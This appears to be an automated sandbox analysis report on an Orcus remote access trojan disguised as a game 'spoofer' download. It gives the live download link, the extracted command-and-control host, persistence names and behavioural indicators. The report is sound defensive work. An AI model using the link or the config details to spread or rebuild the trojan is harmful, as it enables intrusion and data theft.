orcus | hxxps://gofile[.]io/d/dg0UQ7

Resubmissions

09/02/2025, 18:22

250209-wz42vaynbq 8

09/02/2025, 17:59

250209-wk1e4sykhm 10

Analysis

max time kernel
430s
max time network
433s
platform
windows11-21h2_x64
resource
win11-20250207-en
resource tags

arch:x64arch:x86image:win11-20250207-enlocale:en-usos:windows11-21h2-x64system
submitted
09/02/2025, 17:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/dg0UQ7

Score

10^/10

orcus defense_evasion discovery rat spyware stealer

Malware Config

Extracted

Family

orcus

another-contains.gl.at.ply.gg

Mutex

a49af69032c94d6fa7c0d2639d32f038

Attributes

administration_rights_required
false
anti_debugger
false
anti_tcp_analyzer
false
antivm
false
autostart_method
1
change_creation_date
false
force_installer_administrator_privileges
false
hide_file
false
install
false
installation_folder
%appdata%\Microsoft\Speech\AudioDriver.exe
installservice
false
keylogger_enabled
false
newcreationdate
12/24/2024 02:03:43
plugins
AgUFyOzBvwKV1wLetwKoxrcNilV/bBUKRwBhAG0AZQByACAAVgBpAGUAdwAHAzEALgAyAEEgYgA2ADkAZgA0ADUAZQBiADYANgAxADYANAA2ADAAZgA5AGUAMQAwADIAMgBkADcANwA3ADMAMABmADAANwAzAAIAAAACAg==
reconnect_delay
10000
registry_autostart_keyname
Audio HD Driver
registry_hidden_autostart
false
set_admin_flag
false
tasksch_name
Audio HD Driver
tasksch_request_highest_privileges
false
try_other_autostart_onfail
false

aes.plain

Signatures

Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus
Orcus family
orcus

Executes dropped EXE 7 IoCs

pid	Process
2896	GHOSTYFN.exe
5524	GHOSTYFN.exe
1104	spoof.exe
4904	AudioDriver.exe
3860	GHOSTYFN.exe
6108	GHOSTYFN.exe
1256	spoof.exe

Loads dropped DLL 15 IoCs

pid	Process
5524	GHOSTYFN.exe
5524	GHOSTYFN.exe
5524	GHOSTYFN.exe
5524	GHOSTYFN.exe
5524	GHOSTYFN.exe
5524	GHOSTYFN.exe
5524	GHOSTYFN.exe
4904	AudioDriver.exe
6108	GHOSTYFN.exe
6108	GHOSTYFN.exe
6108	GHOSTYFN.exe
6108	GHOSTYFN.exe
6108	GHOSTYFN.exe
6108	GHOSTYFN.exe
6108	GHOSTYFN.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010
Browser Information Discovery 1 TTPs
Enumerate browser information.
discovery

Browser Information Discovery
T1217
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 11 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoof.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	wermgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MicrosoftEdgeUpdate.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GHOSTYFN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AudioDriver.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GHOSTYFN.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoof.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 3 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
2012	MicrosoftEdgeUpdate.exe
4676	MicrosoftEdgeUpdate.exe
1956	MicrosoftEdgeUpdate.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_WDC&Prod_WDS100T2B0A\4&215468a5&0&000000\FriendlyName	taskmgr.exe

Checks processor information in registry 2 TTPs 17 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	firefox.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz	firefox.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision	wermgr.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	wermgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	wermgr.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1387034853-841019411-4036473919-1000_Classes\Local Settings	firefox.exe
Key created	\REGISTRY\USER\S-1-5-21-1387034853-841019411-4036473919-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask	taskmgr.exe
Key created	\REGISTRY\USER\S-1-5-21-1387034853-841019411-4036473919-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.WindowsTerminal_8wekyb3d8bbwe\StartTerminalOnLoginTask	taskmgr.exe

NTFS ADS 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\Downloads\Ghosty Permanent Spoofer.rar:Zone.Identifier	firefox.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4724	powershell.exe
4724	powershell.exe
4724	powershell.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
2028	powershell.exe
2028	powershell.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
2028	powershell.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
4904	AudioDriver.exe
4904	AudioDriver.exe
4904	AudioDriver.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1612	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 30 IoCs

description	pid	Process
Token: SeDebugPrivilege	2936	firefox.exe
Token: SeDebugPrivilege	2936	firefox.exe
Token: SeDebugPrivilege	2936	firefox.exe
Token: SeDebugPrivilege	2936	firefox.exe
Token: SeDebugPrivilege	2936	firefox.exe
Token: SeDebugPrivilege	2936	firefox.exe
Token: SeRestorePrivilege	3960	7zG.exe
Token: 35	3960	7zG.exe
Token: SeSecurityPrivilege	3960	7zG.exe
Token: SeSecurityPrivilege	3960	7zG.exe
Token: SeDebugPrivilege	4724	powershell.exe
Token: SeDebugPrivilege	4904	AudioDriver.exe
Token: SeDebugPrivilege	2028	powershell.exe
Token: SeDebugPrivilege	2936	firefox.exe
Token: SeDebugPrivilege	8	taskmgr.exe
Token: SeSystemProfilePrivilege	8	taskmgr.exe
Token: SeCreateGlobalPrivilege	8	taskmgr.exe
Token: 33	8	taskmgr.exe
Token: SeIncBasePriorityPrivilege	8	taskmgr.exe
Token: SeBackupPrivilege	2400	svchost.exe
Token: SeRestorePrivilege	2400	svchost.exe
Token: SeSecurityPrivilege	2400	svchost.exe
Token: SeTakeOwnershipPrivilege	2400	svchost.exe
Token: 35	2400	svchost.exe
Token: SeDebugPrivilege	1612	taskmgr.exe
Token: SeSystemProfilePrivilege	1612	taskmgr.exe
Token: SeCreateGlobalPrivilege	1612	taskmgr.exe
Token: SeDebugPrivilege	2936	firefox.exe
Token: 33	1612	taskmgr.exe
Token: SeIncBasePriorityPrivilege	1612	taskmgr.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
3960	7zG.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
8	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe
1612	taskmgr.exe

Suspicious use of SetWindowsHookEx 9 IoCs

pid	Process
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2936	firefox.exe
2896	GHOSTYFN.exe
3860	GHOSTYFN.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1992 wrote to memory of 2936	1992	firefox.exe	90
PID 1992 wrote to memory of 2936	1992	firefox.exe	90
PID 1992 wrote to memory of 2936	1992	firefox.exe	90
PID 1992 wrote to memory of 2936	1992	firefox.exe	90
PID 1992 wrote to memory of 2936	1992	firefox.exe	90
PID 1992 wrote to memory of 2936	1992	firefox.exe	90
PID 1992 wrote to memory of 2936	1992	firefox.exe	90
PID 1992 wrote to memory of 2936	1992	firefox.exe	90
PID 1992 wrote to memory of 2936	1992	firefox.exe	90
PID 1992 wrote to memory of 2936	1992	firefox.exe	90
PID 1992 wrote to memory of 2936	1992	firefox.exe	90
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 3260	2936	firefox.exe	91
PID 2936 wrote to memory of 324	2936	firefox.exe	92
PID 2936 wrote to memory of 324	2936	firefox.exe	92
PID 2936 wrote to memory of 324	2936	firefox.exe	92
PID 2936 wrote to memory of 324	2936	firefox.exe	92
PID 2936 wrote to memory of 324	2936	firefox.exe	92
PID 2936 wrote to memory of 324	2936	firefox.exe	92
PID 2936 wrote to memory of 324	2936	firefox.exe	92
PID 2936 wrote to memory of 324	2936	firefox.exe	92

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url "https://gofile.io/d/dg0UQ7"
1⤵
- Suspicious use of WriteProcessMemory
PID:1992
- C:\Program Files\Mozilla Firefox\firefox.exe
  "C:\Program Files\Mozilla Firefox\firefox.exe" -osint -url https://gofile.io/d/dg0UQ7
  2⤵
  - Checks processor information in registry
  - Modifies registry class
  - NTFS ADS
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2936
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=1964 -parentBuildID 20240401114208 -prefsHandle 1892 -prefMapHandle 1884 -prefsLen 27429 -prefMapSize 244658 -appDir "C:\Program Files\Mozilla Firefox\browser" - {f0da864e-42d9-4224-bf9e-59da19ba50fe} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" gpu
    3⤵
    PID:3260
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2364 -parentBuildID 20240401114208 -prefsHandle 2356 -prefMapHandle 2352 -prefsLen 28349 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c599c28f-3bf0-40e8-83b1-143a9f4755b7} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" socket
    3⤵
    PID:324
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3228 -childID 1 -isForBrowser -prefsHandle 3220 -prefMapHandle 3216 -prefsLen 22746 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {21b256c7-feea-4aee-a426-0e215f7aa00a} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab
    3⤵
    PID:2092
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3656 -childID 2 -isForBrowser -prefsHandle 3608 -prefMapHandle 3632 -prefsLen 32839 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {20a9eeae-b411-4d02-802b-14933f13d112} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab
    3⤵
    PID:2384
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4576 -parentBuildID 20240401114208 -sandboxingKind 0 -prefsHandle 4568 -prefMapHandle 4564 -prefsLen 32839 -prefMapSize 244658 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {362f46ce-f206-4424-84fb-4d9d13bcfbda} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" utility
    3⤵
    - Checks processor information in registry
    PID:5384
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5288 -childID 3 -isForBrowser -prefsHandle 5284 -prefMapHandle 5280 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff1b7953-a996-4143-bd60-3e91bd053b2d} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab
    3⤵
    PID:5908
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5424 -childID 4 -isForBrowser -prefsHandle 5432 -prefMapHandle 5436 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {764df39f-0ab4-4cc3-8650-6e5764a1beaf} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab
    3⤵
    PID:5920
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=5696 -childID 5 -isForBrowser -prefsHandle 5616 -prefMapHandle 5620 -prefsLen 27145 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {5be6a179-36f8-45ab-8e0c-0045347d91b9} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab
    3⤵
    PID:5932
- - C:\Program Files\Mozilla Firefox\firefox.exe
    "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=3588 -childID 6 -isForBrowser -prefsHandle 6048 -prefMapHandle 6056 -prefsLen 30775 -prefMapSize 244658 -jsInitHandle 1236 -jsInitLen 234952 -parentBuildID 20240401114208 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {ff6b4771-597e-4506-96a0-a3fec45edb9b} 2936 "\\.\pipe\gecko-crash-server-pipe.2936" tab
    3⤵
    PID:5756

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7RDE5Nzg3NTEtNkVERi00OTM4LThENDktNzI1NTRDQzZEODNCfSIgdXNlcmlkPSJ7Qzg3OUI1RTUtMEQ0MC00RDY4LTg4ODktNjc2RkU4MDEzQTg0fSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7RTYxNEM4OUMtOEZGNC00NjQ3LUE3NzctNDNEREM3RUYwMjVEfSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjEiIGluc3RhbGxkYXRldGltZT0iMTczODk1NjY0MSIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNDI5MjY4NjIxMDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjUxMzg3MzcwMDMiLz48L2FwcD48L3JlcXVlc3Q-
1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --string-annotations --always-read-main-dll --field-trial-handle=5320,i,10197502093716787037,1657341123329582809,262144 --variations-seed-version --mojo-platform-channel-handle=3784 /prefetch:14
1⤵
PID:5168

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "2612" "1264" "1164" "1272" "0" "0" "0" "0" "0" "0" "0" "0"
1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:1612

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
